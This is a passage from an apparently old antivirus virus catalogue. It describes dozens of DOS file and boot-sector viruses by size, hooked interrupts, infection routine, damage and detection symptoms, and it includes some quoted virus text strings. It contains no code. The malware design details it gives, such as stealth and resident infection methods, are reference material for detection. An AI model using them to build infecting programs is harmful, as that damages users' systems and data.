  904. Virus Type: File Virus
  905. Virus Length: 512 bytes
  906. Description: This virus infects *.COM files.
  907. PC Vectors Hooked: INT 13h, INT 21h
  908.  
  909. Infection method: When an infected file runs, the virus loads itself
  910. in the memory. While loaded, it infects accessed .COM files. The
  911. virus overwrites the first 512 bytes of the files it infects, but
  912. stores the original data in free space at the end of the file.
  913.  
  914. Damage: If an infected file is copied, some of its original data could
  915. be destroyed.
  916.  
  917. Note: If you attempt to examine an infected file while the virus is
  918. in memory, it will display the original, uninfected version.
  919.  
  920. [Nop]
  921. Virus Name: Nop
  922. Alias Name: Nops, Stealth_Boot
  923. Virus Type:
  924. Virus Length:
  925. Description: See Stealth_Boot.C
  926.  
  927. [Nov_17th]
  928. Virus Name: Nov_17th
  929. Alias Name: November 17th
  930. Virus Type: File virus
  931. Virus Length: 885 bytes
  932. Description: This virus infects *.COM and *.EXE files.
  933.  
  934. Execution Procedure:
  935. 1) The virus checks whether it is already loaded resident in memory.
  936.     If "No", it then loads itself resident into memory by hooking
  937.     INT 21h.
  938. 2) It then executes the original file.
  939. 3) With itself loaded resident in memory it will infect any uninfected
  940.     file that is executed.
  941.  
  942. Damage: On any day between November 17 and 30, the virus destroys the
  943. first 8 sectors of the current disk.
  944.  
  945. Note: Loads itself resident in memory. An error message appears if
  946. there is an I/O error (such as write protect).
  947.  
  948. [One_half]
  949. Virus Name: One_half
  950. Alias Name:
  951. Virus Type: File Virus
  952. Virus Length: 3,544 bytes
  953. Description: Infects *.COM and *.EXE files as well as COMMAND.COM.
  954. PC Vectors Hooked: INT 21h
  955.  
  956. Infection method: When an infected file runs, the virus loads itself
  957. in memory. While loaded, it infects any accessed executable files or
  958. boot sectors. The DOS CHKDSK program will show a "total bytes memory"
  959. decrease of 4,096 bytes. Infected .COM and .EXE files increase by
  960. 3,544 bytes.
  961.  
  962. Damage: Under analysis
  963.  
  964. Note: If you attempt to examine the hard drive while the virus is in
  965. memory, it will display the original, uninfected version.
  966.  
  967. [Ontario]
  968. Virus Name: Ontario
  969. Alias Name:
  970. Virus Type: File virus
  971. Virus Length: 512 bytes
  972. Description: Infects *.COM, *.EXE and overlay files, as well as
  973.                     COMMAND.COM.
  974.  
  975. When an infected file is executed, the virus installs itself into
  976. memory. Total available memory will decrease by 2,048 bytes.
  977. The virus will also infect COMMAND.COM increasing it's size by 512
  978. bytes.
  979.  
  980. Once the virus is memory resident, it will infect files when they
  981. are executed.  Infected files will increase in size by 512 - 1,023
  982. bytes depending on the type of file.
  983.  
  984. [Parity_boot.b]
  985. Virus Name: Parity_Boot.B
  986. Alias Name: Parity_BOOT.B, Generic1
  987. Virus Type: Boot Virus
  988. Virus Length: N/A
  989. Description: This virus infects boot sectors.
  990. PC Vectors Hooked: INT 13h
  991.  
  992. Infection method: When the system is booted from an infected diskette,
  993. the virus infects the master boot record and loads itself in memory.
  994. While loaded, it infects all accessed, non-protected disks. The DOS
  995. CHKDSK program will show a "total bytes memory" decrease of 1,024 bytes.
  996.  
  997. Damage: The virus sets a one-hour delay timer when the system is turned
  998. on. Each time a floppy is infected, the timer is reset. If no floppies
  999. are infected, the virus simulates a parity error, displaying the
  1000. following message and hanging the system:
  1001.  
  1002.     Parity Check
  1003.  
  1004. Note: If you attempt to examine boot sectors while the virus is in
  1005. memory, it will display the original, uninfected version.
  1006.  
  1007. [Readiosys]
  1008. Virus Name: Readiosys
  1009. Alias Name: AntiCMOS, Lenart
  1010. Virus Type: Boot Virus
  1011. Virus Length: N/A
  1012. Description: This virus infects boot sectors.
  1013.  
  1014. When the system is booted from an infected hard disk, the virus loads
  1015. itself in memory.  After loading successfully, it infects most
  1016. accessed disks.  The DOS CHKDSK program will show a "total bytes
  1017. memory" decrease of 2,048 bytes.
  1018.  
  1019. This virus may change the CMOS settings, depending on the system
  1020. hardware. In many cases, the system will hang before the virus can
  1021. finish loading into memory.
  1022.  
  1023. [Ripper]
  1024. Virus Name: Ripper
  1025. Alias Name: Jack Ripper
  1026. Virus Type:   Boot Virus
  1027. Virus Length: N/A
  1028. Description: This virus infects boot sectors.
  1029.  
  1030. Infection method: The virus is loaded in memory when the system is
  1031. booted from an infected diskette. While loaded, the virus infects
  1032. any accessed, non-protected disks.
  1033.  
  1034. Damage: The virus corrupts the hard disk over time by randomly
  1035. selecting disk writes (approximately 1 per 1000) and swapping two
  1036. words in the write buffer.
  1037.  
  1038. Note: If you attempt to examine the infected boot sectors while the
  1039. virus is in memory, it will display the original, uninfected version.
  1040.  
  1041. [Slayer]
  1042. Virus Name: Slayer
  1043. Alias Name: 5120, Vbasic
  1044. Virus Type: File Virus
  1045. Virus Length: 5,120 bytes
  1046. Description: This virus infects *.COM and *.EXE files.
  1047.  
  1048. When an infected file is executed, the virus will infect all *.COM
  1049. and *.EXE files located in the same directory.  Infected files
  1050. will increase in size from 5,120 to 5,135 bytes with the virus
  1051. being located at the end of the file.  Date and time information
  1052. of infected files will not be altered.
  1053.  
  1054. [Squisher]
  1055. Virus Name: Squisher
  1056. Alias Name: Tiny Hunter
  1057. Virus Type: File Virus
  1058. Virus Length: 340 bytes
  1059. Description: Infects *.COM  files, as well as COMMAND.COM.
  1060.  
  1061. When an infected file is executed, the virus installs itself into
  1062. memory. Total available memory will not change.
  1063.  
  1064. Once the virus is memory resident, it will infect *.COM files that
  1065. contain more than 340 bytes of hex '00' characters when they are
  1066. executed.  Infected files will not experience an increase in size.
  1067. Date and time information of infected files will not be altered.
  1068.  
  1069. [Stealth_Boot.C]
  1070. Virus Name: Stealth_Boot.C
  1071. Alias Name: Amse, Nops, STELBOO, STB
  1072. Virus Type:  Boot Virus
  1073. Virus Length: N/A
  1074. Description: This virus infects boot sectors.
  1075. PC Vectors Hooked: INT 13h
  1076.  
  1077. Infection method: When the system is booted from an infected diskette,
  1078. the virus loads itself in memory and infects the master boot record.
  1079. While loaded, it infects any accessed, non-protected diskettes. The
  1080. DOS CHKDSK program will show a "total bytes memory" decrease of 4,000
  1081. bytes.
  1082.  
  1083. Damage: No intentional damage
  1084.  
  1085. Note: If you attempt to examine the infected hard disk sectors while
  1086. the virus is in memory, it will return a zero-filled buffer.
  1087.  
  1088. [Stoned]
  1089. Virus Name: Stoned
  1090. Alias Name: Marijuana, New Zealand, Stoned.Standard.A
  1091. Virus Type: Boot Virus
  1092. Virus Length: N/A
  1093. Description: This virus infects boot sectors.
  1094. PC Vectors Hooked: INT 13h
  1095.  
  1096. Infection method: When the system is booted from an infected floppy,
  1097. the virus loads itself in memory and infects the hard disk. While
  1098. loaded, it infects any accessed diskettes. The DOS CHKDSK program
  1099. will show a "total bytes memory" decrease of 2,048 bytes.
  1100.  
  1101. Damage: No intentional damage. Displays the text string:
  1102.  
  1103.     "Your PC is now Stoned!"
  1104.  
  1105. [Stoned.Azusa]
  1106. Virus Name: Stoned.Azusa
  1107. Alias Name: Azusa, Hong Kong
  1108. Virus Type: Boot Virus
  1109. Virus Length: N/A
  1110. Description: This virus infects boot sectors.
  1111. PC Vectors Hooked: INT 13h
  1112.  
  1113. Infection method: When a system is booted from an infected disk, the
  1114. virus loads itself in memory. While loaded, it attempts to infect
  1115. any accessed disks.  Unlike most boot sector viruses, it does not
  1116. preserve a copy of the original master boot record. Instead it
  1117. overwrites it and takes over its functions. The DOS CHKDSK program
  1118. will show a "total bytes memory" decrease of 1,024 bytes.
  1119.  
  1120. Damage: After a specified number of reboots, the virus temporarily
  1121. disables the serial and parallel ports.
  1122.  
  1123. [Sunday-1]
  1124. Virus Name: Sunday-1
  1125. Alias Name:
  1126. Virus Type: File Virus
  1127. Virus Length: 1,636 bytes
  1128. Description: Infects *.COM and *.EXE files as well as overlay files.
  1129.  
  1130. Damage: On Sunday, the virus may damage the FAT table.  It will also
  1131. display the following message:
  1132.  
  1133.     "Today is Sunday! Why do you work so hard?
  1134.     All work and no play makes you a dull boy!
  1135.     Come on!  Let's go out and have some fun!"
  1136.  
  1137. [Taiwan]
  1138. Virus Name: Taiwan
  1139. Alias Name: Taiwan 2
  1140. Virus Type: File Virus
  1141. Virus Length: 743 bytes
  1142. Description: Infects *.COM files, including COMMAND.COM.
  1143.  
  1144. When an infected file is executed, the virus will attempt to infect
  1145. three *.COM files starting from C:\. Infected files will increase
  1146. in size by 743 bytes with the virus being located at the beginning
  1147. of the file.
  1148.  
  1149. The virus is activated on the 8th of any month when it will overwrite
  1150. the FAT table and root directory.
  1151.  
  1152. [Telecom]
  1153. Virus Name: Telecom
  1154. Alias Name: Telefonica
  1155. Virus Type: File Virus
  1156. Virus Length: 3,700 bytes
  1157. Description: This virus infects *.COM files.
  1158.  
  1159. When an infected file is executed, the virus installs itself into
  1160. memory. Total available memory will decrease by 3,984 bytes.
  1161.  
  1162. Once the virus is memory resident, it will infect *.COM files that
  1163. are larger than 1,000 bytes when they are executed. Infected files
  1164. will increase in size by 3,700 bytes.  Date and time information
  1165. of infected files will be altered with 100 being added to the year.
  1166.  
  1167. [Tequila]
  1168. Virus Name: Tequila
  1169. Alias Name: Stealth
  1170. Virus Type: File Virus
  1171. Virus Length: 2,468 bytes
  1172. Description: Infects *.EXE files as well as boot sectors.
  1173. PC Vectors Hooked: INT 13h, INT 21h
  1174.  
  1175. Infection method: The first time an infected file runs, the virus
  1176. infects the master boot record. When the system is booted from the
  1177. infected hard disk, the virus loads itself in memory.  While loaded,
  1178. it infects any .EXE file that executes. The DOS CHKDSK program will
  1179. show a "total bytes memory" decrease of 3,072 bytes. Infected .EXE
  1180. files increase by 2,468 bytes.  The virus won't infect files starting
  1181. with "V" or "SC."
  1182.  
  1183. Damage: Several months after the initial infection, the virus becomes
  1184. active. Each month afterward, if an infected program is run on the
  1185. same day of the first infection, a graphic and this message will be
  1186. displayed.
  1187.  
  1188.     Welcome to T.TEQUILA'S latest production.
  1189.     Contact T.TEQUILA/P.o.Box 543/6312
  1190.     St'hausen/Switzerland
  1191.     Loving thoughts to L.I.N.D.A
  1192.     BEER and TEQUILA forever !
  1193.  
  1194. Note: The virus hides the infected partition record and increases
  1195. the size of infected files.
  1196.  
  1197. [Traveller]
  1198. Virus Name: Traveller
  1199. Alias Name: Bupt
  1200. Virus Type: File Virus
  1201. Virus Length: 1,220 to 1,237 bytes
  1202. Description: Infects *.COM and *.EXE files, as well as COMMAND.COM.
  1203.  
  1204. When an infected file is executed, the virus installs itself into
  1205. memory. Total available memory will decreased by 1,840 bytes.
  1206.  
  1207. Once the virus is memory resident, it will infect *.COM and *.EXE
  1208. files when they are executed. This virus will also infect when the
  1209. DIR command is used.  Infected files will increase in size by
  1210. 1,220 to 1,237 bytes, with the virus being located at the end of
  1211. the infected file. Date and time information of infected files
  1212. will not be altered.
  1213.  
  1214. The following text string can be found in the virus:
  1215.  
  1216.     "Traveller (C) BUPT  1991.4"
  1217.     "Don't panic I'm harmless <<---!!!!!!!"
  1218.     "*.* COMEXE"
  1219.  
  1220. [Trivial]
  1221. Virus Name: Trivial
  1222. Alias Name: Minimal, Mini-45
  1223. Virus Type: File Virus
  1224. Virus Length: 45 bytes
  1225. Description: Infects *.COM files, as well as COMMAND.COM.
  1226.  
  1227. When an infected file is executed, the virus will infect all *.COM
  1228. files in same directory.  The first 45 bytes of infected files will
  1229. be overwritten by the virus.  The date and time information of
  1230. infected files will be updated to the time of infection.
  1231.  
  1232. All infected files will be permanently corrupted.
  1233.  
  1234. [V-sign]
  1235. Virus Name: V-sign
  1236. Alias Name: Cansu, Sigalet, Sigalit
  1237. Virus Type:   Boot Virus
  1238. Virus Length: N/A
  1239. Description: This virus infects floppy boot sectors.
  1240. PC Vectors Hooked: INT 13h
  1241.  
  1242. Infection method: When an infected disk is booted, the virus loads
  1243. itself in memory. While loaded, it infects any accessed disk. The
  1244. DOS CHKDSK program will show a "total bytes memory" decrease of 2 KB.
  1245.  
  1246. Damage: After infecting 64 disks, the virus displays a large V and
  1247. hangs the machine.
  1248.  
  1249. [V2P6]
  1250. Virus Name: V2P6
  1251. Alias Name:
  1252. Virus Type: File Virus
  1253. Virus Length: 1,946 to 2,111 bytes
  1254. Description: This virus infects *.COM files.
  1255.  
  1256. When an infected file is executed, the virus will infect the first
  1257. uninfected *.COM file in the same directory. Infected files will
  1258. experience a file length increase of 1,946 to 2,111 bytes with the
  1259. virus being located at the end of the file.
  1260.  
  1261. [Vacsina]
  1262. Virus Name: Vacsina
  1263. Alias Name: Vacsina.TP-05.A, TP family
  1264. Virus Type: File Virus
  1265. Virus Length: 1,206 bytes
  1266. Description: This virus infects *.COM and *.EXE files.
  1267.  
  1268. Infection method: When an infected file runs, the virus loads itself
  1269. in memory. While loaded, it infects any file that executes. Before
  1270. infecting .EXE files, the virus converts them to a .COM file
  1271. format.
  1272.  
  1273. Damage: None known
  1274.  
  1275. Note: There are many known variants of the Vacsina virus. The Vacsina
  1276. family of viruses is also known as the "T.P." family.
  1277.  
  1278. [VCL]
  1279. Virus Name: VCL
  1280. Alias Name: Code Zero
  1281. Virus Type: File Virus
  1282. Virus Length: 576 bytes
  1283. Description: Infects *.COM  files, as well as COMMAND.COM.
  1284.  
  1285. When an infected file is executed, the virus will search the same
  1286. directory for an uninfected *.COM file. Infected files will experience
  1287. a file length increase of 576 bytes with the virus being located
  1288. at the end of the file.  If no uninfected files are found, the
  1289. following message is displayed:
  1290.  
  1291.     "** CODE ZERO **"
  1292.  
  1293. Date and time information of infected files will not be altered.
  1294.  
  1295. The following text string can be found in the virus:
  1296.  
  1297.     "*.* *.COM"
  1298.     "** CODE ZERO **"
  1299.     "Code Zero Virus"
  1300.     "1992 Nowhere Man/[NukE]"
  1301.  
  1302. [Vengence]
  1303. Virus Name: Vengence
  1304. Alias Name: Parasite, Vengeance
  1305. Virus Type: File Virus
  1306. Virus Length: 723 bytes
  1307. Description: Infects *.COM  files, as well as COMMAND.COM.
  1308.  
  1309. When an infected file is executed, the virus will infect the first
  1310. uninfected *.COM file in the same directory.  Infected files will
  1311. experience a file length increase of 723 bytes with the virus
  1312. being located at the end of the file.  Date and time
  1313. information of infected files will be altered to show 56 in the
  1314. seconds field.
  1315.  
  1316. The following text string can be found in the virus:
  1317.  
  1318.     "*** Vengeance is ours! ***"
  1319.     "SKISM/Phalcon '92"
  1320.     "PATH=*.COM"
  1321.     "????????COM"
  1322.  
  1323. [Vienna]
  1324. Virus Name: Vienna
  1325. Alias Name: DOS-62, Unesco, Austrian, 648, PC Boot
  1326. Virus Type: File Virus
  1327. Virus Length: 648 bytes
  1328. Description: This virus infects *.COM files.
  1329.  
  1330. Symptoms: Increases infected file sizes by 648 bytes and files
  1331. containing string "*.COM" and "PATH=". Destroyed programs will
  1332. cause computer to reboot while in operation.
  1333.  
  1334. Damage: With the probability of 1:7 the virus will not infect
  1335. other files. Virus writes the instruction JMP F000:FFF0 (computer
  1336. reboot) at the start of such a program. Original content is
  1337. destroyed, length of file is not changed, and destroyed program
  1338. contains virus flag.
  1339.  
  1340. [XPEH]
  1341. Virus Name: XPEH
  1342. Alias Name: 4-B, Yankee Doodle.XPEH.4928, Micropox
  1343. Virus Type: File Virus
  1344. Virus Length: 4,016 bytes
  1345. Description: This virus infects *.COM and *.EXE files.
  1346. PC Vectors Hooked: INT 1Ch, INT 21h
  1347.  
  1348. Infection method: When an infected file runs, the virus loads itself
  1349. in memory. While loaded, it infects any accessed executable files.
  1350. The DOS CHKDSK program will show a "total bytes memory" decrease of
  1351. 4032 bytes. Infected files increase by 4016 bytes.
  1352.  
  1353. Damage: Under analysis
  1354.  
  1355. [Yank-D.TP.44.A]
  1356. Virus Name: Yank-D.TP.44.A
  1357. Alias Name: Yankee Doodle, TP44
  1358. Virus Type: File Virus
  1359. Virus Length: 2,899 bytes
  1360. Description: This virus infects *.COM and *.EXE files.
  1361.  
  1362. When an infected file is executed, the virus installs itself into
  1363. memory. Once the virus is memory resident, it plays the song "Yankee
  1364. Doodle" on the computer speaker everyday at 5 p.m.
  1365.  
  1366. Infected files will experience a file length increase of 2,899 bytes.
  1367.  
  1368. [Yank.44.A]
  1369. Other Name: Yank-44A
  1370. Virus Type: File Virus
  1371. Virus Length: Approximately 2880 bytes
  1372. Virus Memory Type:
  1373. Trigger Condition: Triggers if time is 5:00 pm of any day.
  1374.                    Plays part of the song: "Jack and Jill"
  1375. Run Directly: Loads virus code to high memory
  1376.  
  1377. PC Vectors Hooked: Int 21
  1378.  
  1379. Infection Procedure:
  1380. 1) Loads itself to high memory, allocating 3008 bytes.
  1381. 2) Moves 2880 bytes onto the memory.
  1382. 3) Infects *.COM and *.EXE files. Copies the virus code to the
  1383.    host program. Loads the virus first before running the host
  1384.    program.
  1385.  
  1386.  
  1387.  
  1388.  
  1389.  
  1390. [Simple]
  1391. Virus Name: Simple cd
  1392. Virus Type: File Virus (infects .COM files only.)
  1393. Virus Length:  No change
  1394. PC Vectors Hooked: None
  1395.  
  1396. Execution Procedure: Searches for .COM files in the current directory.
  1397. When it finds a .COM file it checks whether it has been  previously
  1398. infected by the SIMPLE virus. If "YES" it continues to look
  1399. for uninfected .COM files. It then infects the file and looks for the
  1400. next COM file until all the .COM files in the current directory are
  1401. infected.
  1402.  
  1403. Damage: Overwrites the original file, so the length of the original
  1404. file won't reflect any increase. Note: Doesn't stay resident in
  1405. memory. SIMPLE doesn't hook INT 24h when infecting files. Error
  1406. message appears if there is an I/O error present (such as write
  1407. protect).
  1408.  
  1409. [Alien-1]
  1410. Virus Name: Alien-1
  1411. Virus Type: File Virus (infects .COM and .EXE files.)
  1412. Virus Length: 571 Bytes (COM and EXE)
  1413. PC Vectors Hooked: INT 21h
  1414.  
  1415. Execution Procedure: Checks whether it has been loaded resident in
  1416. high memory. If "No", then it loads itself resident into memory
  1417. (highest memory) by hooking INT 21, then it executes the
  1418. originally called file; if "Yes", then it directly executes
  1419. the originally called file.
  1420.  
  1421. Damage:  None
  1422.  
  1423. Characteristics:
  1424. 1) The virus infects files by hooking INT 21h(AX=4B), when an
  1425.     uninfected file is executed, the file will be infected.
  1426. 2) Alien-1 doesn't hook INT 24h when infecting files. Error
  1427.     messages occur if there is an I/O error (such as write protect).
  1428.  
  1429. Detection Method: Infected files will increase by 571 bytes.
  1430.  
  1431. [Lep-0736]
  1432. Virus Name: Lep-0736
  1433. Virus Type: File Virus (infects .COM and .EXE files.)
  1434. Virus Length: No change
  1435. PC Vectors Hooked: None
  1436.  
  1437. Execution Procedure:
  1438. 1) Searches for .COM and .EXE files in current directory.
  1439. 2) Checks whether the files found have been infected by LEP-0736.
  1440.     If "Yes", continue to look for an uninfected COM and EXE files.
  1441. 3) Infects the uninfected file (infects only four files at a time).
  1442.     Then the following message appears on the screen: "Program too
  1443.     big to fit in memory"
  1444.  
  1445. Damage: Overwrites the original file, so the length of the file won't
  1446. increase.
  1447.  
  1448. Detection Method: Check for the error message: "Program too big to
  1449. fit in memory."
  1450.  
  1451. Note:
  1452. 1) Doesn't stay resident in memory.
  1453. 2) LEP-0736 doesn't hook INT 24h when infecting files. Error message
  1454.     appears if there is an I/O error (such as write protect).
  1455.  
  1456. [Ice-199]
  1457. Virus Name: Ice-199
  1458. Virus Type: File Virus (infects .COM files only.)
  1459. Virus Length: 199 Bytes
  1460. PC Vectors Hooked: None
  1461.  
  1462. Execution Procedure:
  1463. 1) Searches for a .COM file in the current directory.
  1464. 2) Checks whether it has been infected by Ice-199. If "Yes",
  1465.     continues to look for an uninfected .COM file.
  1466. 3) Infects only one file at a time.
  1467.  
  1468. Damage: None
  1469.  
  1470. Detection Method: Infected files will increase length by 199 bytes.
  1471.  
  1472. Note:
  1473. 1) Doesn't stay resident in memory.
  1474. 2) ICE-199 doesn't hook INT 24h when infecting files. Error message
  1475.     appears if there is an I/O error (such as write protect).
  1476.  
  1477. [Made-255]
  1478. Virus Name: Made-255
  1479. Virus Type: File Virus (infects .COM files.)
  1480. Virus Length: 255 Bytes
  1481. PC Vectors Hooked: None
  1482.  
  1483. Execution Procedure:
  1484. 1) Searches for a .COM file in the current directory.
  1485. 2) Checks whether it has been infected by Made-255. If "Yes",
  1486.     it continues to look for an uninfected .COM file.
  1487. 3) Infects only one file at a time.
  1488.  
  1489. Damage: None
  1490.  
  1491. Detection Method: Infected files will increase by 255 bytes.
  1492.  
  1493. Note:
  1494. 1) After an infected file is executed, the system  will halt.
  1495. 2) Doesn't stay resident in memory.
  1496. 3) MADE-255 doesn't hook INT 24h when infecting files. Error
  1497.     message appears if there is an I/O error (such as write protect).
  1498.  
  1499. [2570]
  1500. Virus Name: 2570
  1501. Virus Type: File Virus (infects .COM files only)
  1502. Virus Length: 2570 Bytes
  1503. PC Vectors Hooked: None
  1504.  
  1505. Execution Procedure: Searches for a .COM file in the current directory.
  1506. Checks first to verify if the file has been previously infected by 2570.
  1507. If "Yes", continues to look for an uninfected .COM file. Infects only
  1508. one .COM file at a time. After infection, information such as those
  1509. listed below will appear on the infected computer screen:
  1510.  
  1511. a) Cycle sluts from hell..
  1512. b) Virus Mania IV..
  1513. c) 2 Live Crew is fucking cool..
  1514. d) Like Commentator I, HIP-HOP sucks..
  1515. e) dr. Ruth is a first-class lady!..
  1516. f) Don t be a wimp, Be dead!.. and so on. Then the
  1517.    originally called program will be executed.
  1518.  
  1519. Damage: None
  1520.  
  1521. Detection Method: Infected files will increase by 2570 bytes.
  1522.  
  1523. Note: Doesn't stay resident in memory. 2570 doesn't hook INT 24h
  1524. when infecting files. Error message appears if there is an I/O error
  1525. (such as write protect).
  1526.  
  1527. [Ice-250]
  1528. Virus Name: Ice-250
  1529. Virus Type: File Virus (infects .COM files)
  1530. Virus Length: 250 Bytes
  1531. PC Vectors Hooked: None
  1532.  
  1533. Execution Procedure:
  1534. 1) Searches for a .COM file in the current directory.
  1535. 2) Checks whether it has been infected by Ice-250. If "Yes", it
  1536.     continues to look for an uninfected .COM file.
  1537. 3) It infects only one file at a time.
  1538.  
  1539. Damage: None
  1540.  
  1541. Detection Method: Infected files will increase by 250 bytes.
  1542.  
  1543. Note:
  1544. 1) Doesn't stay resident in memory.
  1545. 2) ICE-250 doesn't hook INT 24h when infecting files. Error
  1546.     message appears if there is an I/O error (such as write protect).
  1547.  
  1548. [Ice-224]
  1549. Virus Name: Ice-224
  1550. Virus Type: Virus Infector (infects .COM files)
  1551. Virus Length: 224 Bytes
  1552. PC Vectors Hooked: None
  1553.  
  1554. Execution Procedure:
  1555. 1) Searches for a .COM file in the current directory.
  1556. 2) Checks whether it has been infected by Ice-224. If "Yes",
  1557.     it continues to look for an uninfected .COM file.
  1558. 3) Infects only one file at a time.
  1559.  
  1560. Damage: None
  1561.  
  1562. Detection Method: Infected files will increase by 224 bytes.
  1563.  
  1564. Note:
  1565. 1) Doesn't stay resident in memory.
  1566. 2) ICE-224 doesn't hook INT 24h when infecting files. Error message
  1567.     appears if there is an I/O error (such as write protect).
  1568.  
  1569. [Lct-762]
  1570. Virus Name: Lct-762
  1571. Virus Type: File Virus (infects .COM files)
  1572. Virus Length: 762 Bytes
  1573. PC Vectors Hooked: None
  1574.  
  1575. Execution Procedure:
  1576. 1) Searches for a .COM file in the current directory.
  1577. 2) Checks whether it has been infected by LCT-762. If "Yes",
  1578.     continues to look for an uninfected .COM file.
  1579. 3) Infects  uninfected files until all .COM files in the directory
  1580.     have been infected.
  1581.  
  1582. Damage: None
  1583.  
  1584. Detection Method: Infected files will increase by 762 bytes.
  1585.  
  1586. Note:
  1587. 1) Doesn't stay resident in memory.
  1588. 2) LCT-762 doesn't hook INT 24h when infecting files. An error
  1589.     message appears if there is an I/O error (such as write protect).
  1590.  
  1591. [Alien-3]
  1592. Virus Name: Alien-3
  1593. Virus Type: File Virus (infects .COM and .EXE files)
  1594. Virus Length: 625 Bytes (COM and EXE)
  1595. PC Vectors Hooked: INT 21h
  1596.  
  1597. Execution Procedure:
  1598. 1) Checks whether it has been loaded resident in high memory.
  1599.     If "No", then it loads itself resident into memory (highest
  1600.     memory portion) by hooking INT 21h.
  1601. 2) The virus will then check the system time; if the number of
  1602.     minutes passed in the hour are between 33 to 60, it will display
  1603.     " " parentheses on the screen.
  1604. 3) After infection it will then execute the original file.
  1605.  
  1606. Damage:  None
  1607.  
  1608. Characteristics:
  1609. 1) The virus infects files by hooking INT 21h (AX=4B), when an
  1610.     uninfected file is executed, the file will be infected.
  1611. 2) Alien-3 doesn't hook INT 24h when infecting files. Error message
  1612.     appears if there is an I/O error (such as write protect).
  1613.  
  1614. Detection Method: Infected files will increase by 625 Bytes.
  1615.  
  1616. [Lep-562]
  1617. Virus Name: Lep-562
  1618. Virus Type: File Virus (infects .COM and .EXE files)
  1619. Virus Length: No change
  1620. PC Vectors Hooked: None
  1621.  
  1622. Execution Procedure:
  1623. 1) It first searches for a .COM or .EXE file in the current directory.
  1624. 2) It checks whether it has been infected by LEP-562. If "Yes", it
  1625.     continues to look for uninfected .COM and .EXE files.
  1626. 3) If "No" it will infect the uninfected files (infecting only four
  1627.     files at a time). When you execute the file the following message
  1628.     appears on the screen:
  1629.  
  1630.       "Program too big to fit in memory."
  1631.  
  1632. Damage: Overwrites the original file, so the length of the file won't
  1633. increase.
  1634.  
  1635. Detection Method: Check for the message: "Program too big to fit in
  1636. memory" on the screen.
  1637.  
  1638. Note:
  1639. 1) Doesn't stay resident in memory.
  1640. 2) LEP-562 doesn't hook INT 24h when infecting files. Error message
  1641.     appears if there is an I/O error (such as write protect).
  1642.  
  1643. [Navi-282]
  1644. Virus Name: Navi-282
  1645. Virus Type: File Virus (infects .COM files only)
  1646. Virus Length: 282 Bytes
  1647. PC Vectors Hooked: None
  1648.  
  1649. Execution Procedure:
  1650. 1) Searches for a .COM file in the current directory.
  1651. 2) Checks whether it has been infected by NAVI-282. If "Yes", it
  1652.     continues to look for any uninfected .COM files.
  1653. 3) Infects only one file at a time.
  1654.  
  1655. Damage: None
  1656.  
  1657. Detection Method: Infected files will increase by 282 bytes.
  1658.  
  1659. Note:
  1660. 1) Doesn't stay resident in memory.
  1661. 2) NAVI-282 doesn't hook INT 24h when infecting files. Error message
  1662.     appears if there is an I/O error (such as write protect).
  1663.  
  1664. [Minimite]
  1665. Virus Name: Minimite
  1666. Virus Type: File Virus (infects .COM files)
  1667. Virus Length: 183 Bytes
  1668. PC Vectors Hooked: None
  1669.  
  1670. Execution Procedure:
  1671. 1) Searches for a .COM file in the current directory.
  1672. 2) Checks whether it has been infected by Minimite. If "Yes", it
  1673.     continues to look for any uninfected .COM files.
  1674. 3) It then continues to infect files until all .COM files in the
  1675.     directory have been infected.
  1676.  
  1677. Damage: None
  1678.  
  1679. Detection Method: Infected files will increase by 183 Bytes.
  1680.  
  1681. Note:
  1682. 1) Doesn't stay resident in memory.
  1683. 2) Minimite doesn't hook INT 24h when infecting files. Error message
  1684.     appears if there is an I/O error (such as write protect).
  1685.  
  1686. [Spanz]
  1687. Virus Name: Spanz
  1688. Virus Type: File Virus (infects .COM files)
  1689. Virus Length: 639 Bytes
  1690. PC Vectors Hooked: None
  1691.  
  1692. Execution Procedure:
  1693. 1) Searches for a .COM file in the current directory.
  1694. 2) It then checks the date of the .COM file.
  1695. 3) Checks whether it has been infected by Spanz. If "Yes", continues
  1696.     to look for any uninfected .COM files.
  1697. 3) Infects only one file at a time.
  1698.  
  1699. Damage: None
  1700.  
  1701. Detection Method: Infected files will increase by 639 Bytes.
  1702.  
  1703. Note:
  1704. 1) Doesn't stay resident in memory.
  1705. 2) Spanz doesn't hook INT 24h when infecting files.  Error message
  1706.     appears if there is an I/O error (such as write protect).
  1707.  
  1708. [Wilbur]
  1709. Virus Name: Wilbur
  1710. Virus Type: File Virus (infects .COM files)
  1711. Virus Length: 512 Bytes
  1712. PC Vectors Hooked: None
  1713.  
  1714. Execution Procedure:
  1715. 1) Searches for a .COM file in the current directory.
  1716. 2) It then checks whether it has been infected by Wilbur. If "Yes",
  1717.     it continues to look for any uninfected .COM files.
  1718. 3) It infects only one file at a time.
  1719. 4) After infection it executes the originally called file.
  1720.  
  1721. Damage:  None
  1722.  
  1723. Detection Method: Infected files will increase by 512 Bytes.
  1724.  
  1725. Note:
  1726. 1) Doesn't stay resident in memory.
  1727. 2) Wilbur doesn't hook INT 24h when infecting files. Error message
  1728.     appears if there is an I/O error (such as  write protect).
  1729.  
  1730. [Repent]
  1731. Virus Name: Repent
  1732. Virus Type: File Virus (infects .COM files)
  1733. Virus Length: No change
  1734. PC Vectors Hooked: None
  1735.  
  1736. Execution Procedure:
  1737. 1) Searches for a .COM file in the current directory.
  1738. 2) It then checks whether it has been infected by Repent. If "Yes",
  1739.     it continues to look for any uninfected .COM files.
  1740. 3) It infects only three files at a time.
  1741.  
  1742. Damage: Overwrites original file, so the length of infected file
  1743. won't increase.
  1744.  
  1745. Note:
  1746. 1) Doesn't stay resident in memory.
  1747. 2) Repent doesn't hook INT 24h when infecting files. Error message
  1748.     appears if there is an I/O error (such as write protect).
  1749.  
  1750. [Twin-Peak]
  1751. Virus Name: Twin-Peak
  1752. Virus Type: File Virus (infects .COM files)
  1753. Virus Length: No change
  1754. PC Vectors Hooked: None
  1755.  
  1756. Execution Procedure:
  1757. 1) Searches for a .COM file in the  current directory.
  1758. 2) Checks to see whether it has been infected by TWIN-PEAK. If "Yes",
  1759.     it continues to look for any uninfected .COM file.
  1760. 3) It only infects one file at a time.
  1761.  
  1762. Damage: Overwrites original file, so the length of infected file
  1763. won't increase.
  1764.  
  1765. Note:
  1766. 1) Doesn't stay resident in memory.
  1767. 2) TWIN-PEAK doesn't hook INT 24h when infecting files. Error
  1768.     message appears if there is an I/O error (such as write protect).
  1769.  
  1770. [Pa-5792]
  1771. Virus Name: Pa-5792
  1772. Virus Type: File Virus (infects .EXE files)
  1773. Virus Length: 5792 Bytes
  1774. PC Vectors Hooked: None
  1775.  
  1776. Execution Procedure:
